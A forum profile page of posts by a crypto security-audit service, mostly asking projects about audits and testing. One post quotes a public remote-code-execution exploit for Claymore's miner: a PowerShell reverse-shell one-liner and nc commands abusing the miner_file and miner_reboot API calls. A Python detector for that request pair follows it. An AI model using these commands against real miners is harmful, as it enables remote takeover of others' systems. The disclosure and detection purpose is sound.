Showing 20 of 34 results by blockaudit
Post
Topic
Board Services
Re: Code Auditing and Security Services (+ referral program)
by
blockaudit
on 18/07/2018, 16:11:39 UTC
Hello! My name is Olga, I represent company W12.io.
We plan to launch a referral program, according to which people can earn real money. I saw that you were doing a referral program for the Blockaudit project. Tell me, what is included in this program and how do you promote it? We are interested in cooperation. Thank you!

Olga,

You can check out our website's referral section for more details:

https://www.blockaudit.org/referrals.html
Post
Topic
Board Mining (Altcoins)
Re: Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v11.7 (Windows/Linux)
by
blockaudit
on 18/05/2018, 18:35:12 UTC

More precisely, it works until v8.1, in v8.1 "-mport" is working in read-only mode by default, check "History.txt" file for details. Another thing required for this "exploit" is direct access to internet for the system, it will not work via NAT or firewall without your permission.
Later versions had another issue that was fixed too, see my message:
https://bitcointalk.org/index.php?topic=1433925.msg28540417#msg28540417

Thanks for the data, good to know!

Have you all had any official security code reviews or application pen-tests in order to have more confidence that these types of trivial issues won't be found again?
Post
Topic
Board Mining (Altcoins)
Re: Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v11.7 (Windows/Linux)
by
blockaudit
on 17/05/2018, 18:40:10 UTC
FYI a remote exploit for v7.3+ was made public:

https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/
https://www.exploit-db.com/exploits/44638/

Quote
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
 
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
Convert it into hexadecimal and paste it on the second parameter inside this string:
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
 
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"} string to the miner.
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
 
You got the shell!
 
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.

It's unclear if this issue has been fixed or not, feel free to provide more information on what versions it was fixed on if so.

Quote
Before continuing to read I want to clarify that I already emailed nanopool without receiving any kind of response, so I’m publicly disclosing this vulnerability waiting for a CVE assignment.
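
A defender-side check for the request pair described in the quoted write-up, added here as an example and not taken from the post or from the miner's author: it reviews JSON-RPC lines captured on the management port and flags a miner_file write to a reboot script followed by miner_reboot. The capture format of (source IP, JSON line) tuples, the severity labels and the sample records are assumptions constructed for illustration.

```python
import json

# Method and file names are the ones quoted in the post above.
WRITE_METHOD, REBOOT_METHOD = "miner_file", "miner_reboot"
SCRIPT_NAMES = {"reboot.bat", "reboot.bash", "reboot.sh"}

# Constructed sample capture (documentation IP ranges, harmless file body).
SAMPLE = [
    ("192.0.2.10", '{"id":0,"jsonrpc":"2.0","method":"status_placeholder"}'),
    ("198.51.100.7", json.dumps({"id": 0, "jsonrpc": "2.0", "method": WRITE_METHOD,
        "params": ["reboot.bat", b"echo constructed sample".hex()]})),
    ("198.51.100.7", '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}'),
    ("192.0.2.10", '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}'),
]

def decode_hex(value):
    """Decode a hex-encoded file body for analyst review; None if it is not hex."""
    try:
        return bytes.fromhex(value).decode("ascii", errors="replace")
    except (ValueError, TypeError):
        return None

def review_requests(records):
    """Return (source_ip, severity, detail) findings for captured requests."""
    findings = []
    pending = {}  # source_ip -> reboot script written but not yet triggered
    for src, raw in records:
        try:
            msg = json.loads(raw)
        except json.JSONDecodeError:
            findings.append((src, "info", "unparseable request"))
            continue
        if not isinstance(msg, dict):
            continue
        method, params = msg.get("method"), msg.get("params") or []
        if method == WRITE_METHOD and isinstance(params, list) and len(params) >= 2:
            name = str(params[0]).lower()
            if name in SCRIPT_NAMES:
                pending[src] = name
                findings.append((src, "high", f"{name} overwritten: {decode_hex(params[1])!r}"))
            else:
                findings.append((src, "medium", f"file upload: {name}"))
        elif method == REBOOT_METHOD:
            if src in pending:
                findings.append((src, "critical", f"miner_reboot after {pending.pop(src)} write"))
            else:
                findings.append((src, "medium", "remote reboot request"))
    return findings
```

Any hit from an address outside the management network is worth an alert on its own, since the API port should not be reachable from there at all.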
Post
Topic
Board Tokens (Altcoins)
Re: [ANN] SONM • Decentralized Fog Computing Platform
by
blockaudit
on 16/05/2018, 22:52:49 UTC
Per this announcement:

https://blog.sonm.io/sonm-crypto-iaas-is-here-2ab02e153d31

Docker is a container environment and is not meant to provide isolation between containers running on the same system. Will you have multiple containers running unrelated jobs on the same system?

If so, once a bug is discovered or the running code manages to escape the intended execution process, the blast radius of compromise will assume all containers running on that machine. That's why hypervisors which utilize hardware-assisted security for real virtual machines are standard for actual isolation of code.

Just google and read a few of the past problems to get an idea of how folks are going to escape from docker and similar container platforms in the future:

https://www.google.com/search?q=docker+escape

What is the plan to mitigate this? Lose the performance improvements without actual isolation and just run (1) container per bare metal? Better to get this right beforehand rather than later.

Are any penetration tests scheduled to get the data to further harden the system?
Post
Topic
Board Services
Re: Code Auditing and Security Services (+ referral program)
by
blockaudit
on 04/05/2018, 22:28:12 UTC
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NET] - The Browser Based Blockchain - Main net Q1 2018 - Liqui
by
blockaudit
on 30/04/2018, 05:41:46 UTC
Great mainnet post on Medium, being added on Ledger will be super cool. Does the team plan to do a security/code review on the wallet, or the web browser?
Post
Topic
Board Services
Re: Code Auditing and Security Services (+ referral program)
by
blockaudit
on 30/04/2018, 05:14:40 UTC
You can follow some of our pro-bono contributions to the security of blockchain projects on github as well:

https://github.com/blockauditech
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][HEXX: REBORN] Xnodes| Zero Protocol | Community Driven | CPU Only
by
blockaudit
on 27/04/2018, 18:48:42 UTC
https://twitter.com/hxxcoin/status/989640546342842369

Could you share the security relevant commit links?

Thanks!
Post
Topic
Board Announcements (Altcoins)
Re: LBRY.IO - DICUSSION THREAD
by
blockaudit
on 27/04/2018, 00:25:19 UTC
Nice project folks!

Wondering if you all have had a formal code audit or pen-test of the LBC application and media player... seems like a lot of cool features and therefore attack surface to cover.

Do you all regularly perform security code reviews in the dev process or penetration test engagements on the app and/or infrastructure side?
Post
Topic
Board Services
Re: Code Auditing and Security Services (+ referral program)
by
blockaudit
on 26/04/2018, 23:58:40 UTC
Post
Topic
Board Announcements (Altcoins)
Re: [ANN] IPBC | NOW LIVE | NO PREMINE | NO ICO | FIRST MEDIA MINING PLAYER
by
blockaudit
on 26/04/2018, 18:40:23 UTC
Hey folks,

Why is the password limit 16 characters on ipbc.io?

If nothing else, it doesn't 'look good' to limit credentials like that, especially when often folks do much bigger random ones by default... ;-)

Shouldn't cost any more perf on the backend to open it up to 40 characters max.
Post
Topic
Board Tokens (Altcoins)
Re: [ANN] [ICO] MONETHA - Decentralised reputation with built-in payments
by
blockaudit
on 25/04/2018, 04:22:50 UTC
Got to know this project last summer, being disruptive in the online marketplace is an awesome story!

With the exciting app launch coming up (looking forward to the official announcement, btw), has the team done a security review on the app, especially it’s dealing with buyer and seller info, as well as transaction/rating data?
Post
Topic
Board Tokens (Altcoins)
Re: [SOLD OUT] 🔴ADHIVE🔴 The first AI-controlled platform for influencer marketing
by
blockaudit
on 24/04/2018, 01:03:50 UTC
Have you all run tools like Manticore on the contracts, or had any sort of audit yet either of the current contracts or regular security code reviews built into the dev process for the exchange?

Just a cursory Manticore run yielded some potential issues, so just a heads up you all might want to give it a go to get the full results and see if they are or aren't exploitable.

Code:
Global Findings:
- Integer overflow at ADD instruction -
         Contract: 159725171979439281175487293058222017669144629231
         Program counter: 6291
........
- Potentially reading uninitialized storage -
         Contract: 159725171979439281175487293058222017669144629231
         Program counter: 1695

Hello!
We use our own developed AI modules.

You do use the contracts on your github, right?

https://github.com/Tokpie/tokpie-contract/

That's the code on which the tools run on for results.
Post
Topic
Board Announcements (Altcoins)
Re: Zoin - Privacy Based Zerocoin Protocol. NIX Announcement 4/30
by
blockaudit
on 23/04/2018, 20:25:15 UTC
Big things are happening! check the repo for a sneak peek https://github.com/NixPlatform

Lots of commits lately :)

How are you all avoiding security issues with Angular and such? Someone on the team checking each CR for sanitization and validation?

Must watch out for ngBindHtml() and a few others...
Post
Topic
Board Tokens (Altcoins)
Re: [SOLD OUT] 🔴ADHIVE🔴 The first AI-controlled platform for influencer marketing
by
blockaudit
on 23/04/2018, 15:53:06 UTC
Have you all run tools like Manticore on the contracts, or had any sort of audit yet either of the current contracts or regular security code reviews built into the dev process for the exchange?

Just a cursory Manticore run yielded some potential issues, so just a heads up you all might want to give it a go to get the full results and see if they are or aren't exploitable.

Code:
Global Findings:
- Integer overflow at ADD instruction -
         Contract: 159725171979439281175487293058222017669144629231
         Program counter: 6291
........
- Potentially reading uninitialized storage -
         Contract: 159725171979439281175487293058222017669144629231
         Program counter: 1695
Post
Topic
Board Announcements (Altcoins)
Re: BYTEBALL: Totally new consensus algorithm + private untraceable payments
by
blockaudit
on 22/04/2018, 22:16:13 UTC
Quite a bit of new code from writing the client, wallet, protocol implementation from scratch... have you all put together a proper threat model, identified (and reduced) attack surface and tested a bunch of key interfaces to shake out any security related bugs yet?

Big fan of the Byteball project btw :)
Post
Topic
Board Announcements (Altcoins)
Re: 👽 [ANN][BIS]Bismuth - New Language, Free DAPPs, Cryptopia, HEAT
by
blockaudit
on 22/04/2018, 18:25:14 UTC
That's quite a bit of new code for this project, rapid releases and all. Writing it in Python over C/C++ gives you quite a bit of advantages for not having to deal with casting, native memory allocations, etc.

Have you all had an audit of the code base, fuzzing or other security testing to shake out some bugs, e.g. in the daemon?
Post
Topic
Board Tokens (Altcoins)
Re: WINGS ★ Where DAO Unicorns Are Born! ★ Token launched!
by
blockaudit
on 22/04/2018, 03:45:12 UTC
Big fan of the Wings project. But I bet there's a lot of complexity in the backend to handle the platform side of things.

Besides the smart contract, have you all had a deeper security review into the infrastructure and website portions, the various code handling user interactions and such?
Post
Topic
Board Announcements (Altcoins)
Re: Belacoin - Supercharging entrepreneurship with the power of the blockchain
by
blockaudit
on 22/04/2018, 01:17:30 UTC
Hey Belacoin, what's your security story for the website, backend, mobile app, etc?

Looks like there's quite a bit to do for supporting the infrastructure, keeping all the data safe and validating all the upload/comment stuff on the website.

Loving the tagging feature by the way!
Post
Topic
Board Announcements (Altcoins)
Re: Primalbase - Distributed Workspace for Tech Community
by
blockaudit
on 19/04/2018, 19:50:26 UTC
Just curious what data you can provide on the web services and backend having a proper penetration test or security audit. It seems like there's a lot going on to make various aspects of the site work for users, including scheduling, balance retrieval and especially the cool up and coming leasing program.

Thanks!